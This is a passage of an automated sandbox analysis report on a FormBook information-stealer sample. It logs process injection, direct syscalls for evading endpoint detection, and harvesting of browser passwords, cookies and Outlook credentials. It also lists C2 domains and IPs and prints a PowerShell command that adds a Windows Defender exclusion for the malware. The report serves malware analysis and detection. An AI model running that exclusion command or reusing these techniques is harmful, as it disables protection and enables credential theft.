                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtWriteVirtualMemory: Direct from: 0x76F12E3CJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtNotifyChangeKey: Direct from: 0x76F13C2CJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtProtectVirtualMemory: Direct from: 0x76F07B2EJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtProtectVirtualMemory: Direct from: 0x76F12F9CJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtSetInformationProcess: Direct from: 0x76F12C5CJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtOpenKeyEx: Direct from: 0x76F12B9CJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtQueryInformationProcess: Direct from: 0x76F12C26Jump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtResumeThread: Direct from: 0x76F12FBCJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtDelayExecution: Direct from: 0x76F12DDCJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtReadFile: Direct from: 0x76F12ADCJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtQuerySystemInformation: Direct from: 0x76F12DFCJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtAllocateVirtualMemory: Direct from: 0x76F12BFCJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\SysWOW64\SndVol.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: NULL target: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: NULL target: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\SndVol.exeThread register set: target process: 6460Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\SndVol.exeThread APC queued: target process: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeProcess created: C:\Windows\SysWOW64\SndVol.exe "C:\Windows\SysWOW64\SndVol.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000002.3767667596.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 00000008.00000000.1584077719.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000000.1746226691.0000000001381000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000002.3767667596.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 00000008.00000000.1584077719.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000000.1746226691.0000000001381000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000002.3762337231.000000000075E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Software\Microsoft\Multimedia\Audio\SndVolSndVolPreferencesMaskSndVolSelectedDevicesShell_TrayWnd
                Source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000002.3767667596.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 00000008.00000000.1584077719.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000000.1746226691.0000000001381000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000002.3767667596.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 00000008.00000000.1584077719.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000000.1746226691.0000000001381000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram Manager
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3768384183.0000000004E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1669076954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1671103220.0000000001B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3768451567.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3768386121.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3757230807.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1671316261.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3768471999.0000000004260000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\SndVol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3768384183.0000000004E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1669076954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1671103220.0000000001B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3768451567.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3768386121.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3757230807.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1671316261.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3768471999.0000000004260000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1608104 Sample: file.exe Startdate: 06/02/2025 Architecture: WINDOWS Score: 100 37 www.infiniteture.xyz 2->37 39 www.ticquan.xyz 2->39 41 18 other IPs or domains 2->41 49 Suricata IDS alerts for network traffic 2->49 51 Antivirus detection for URL or domain 2->51 53 Multi AV Scanner detection for submitted file 2->53 57 6 other signatures 2->57 10 file.exe 4 2->10         started        signatures3 55 Performs DNS queries to domains with low reputation 39->55 process4 file5 35 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 10->35 dropped 69 Adds a directory exclusion to Windows Defender 10->69 71 Injects a PE file into a foreign processes 10->71 14 file.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 73 Maps a DLL or memory area into another process 14->73 19 CQcxGFiNQWzmXwbg1.exe 14->19 injected 75 Loading BitLocker PowerShell Module 17->75 22 WmiPrvSE.exe 17->22         started        24 conhost.exe 17->24         started        process9 signatures10 59 Found direct / indirect Syscall (likely to bypass EDR) 19->59 26 SndVol.exe 13 19->26         started        process11 signatures12 61 Tries to steal Mail credentials (via file / registry access) 26->61 63 Tries to harvest and steal browser information (history, passwords, etc) 26->63 65 Modifies the context of a thread in another process (thread injection) 26->65 67 3 other signatures 26->67 29 CQcxGFiNQWzmXwbg1.exe 26->29 injected 33 firefox.exe 26->33         started        process13 dnsIp14 43 intention.digital 46.38.243.234, 50025, 50026, 50027 NETCUP-ASnetcupGmbHDE Germany 29->43 45 sparkletime.cloud 92.60.36.190, 49981, 49982, 49983 NETCUP-ASnetcupGmbHDE Germany 29->45 47 10 other IPs or domains 29->47 77 Found direct / indirect Syscall (likely to bypass EDR) 29->77 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.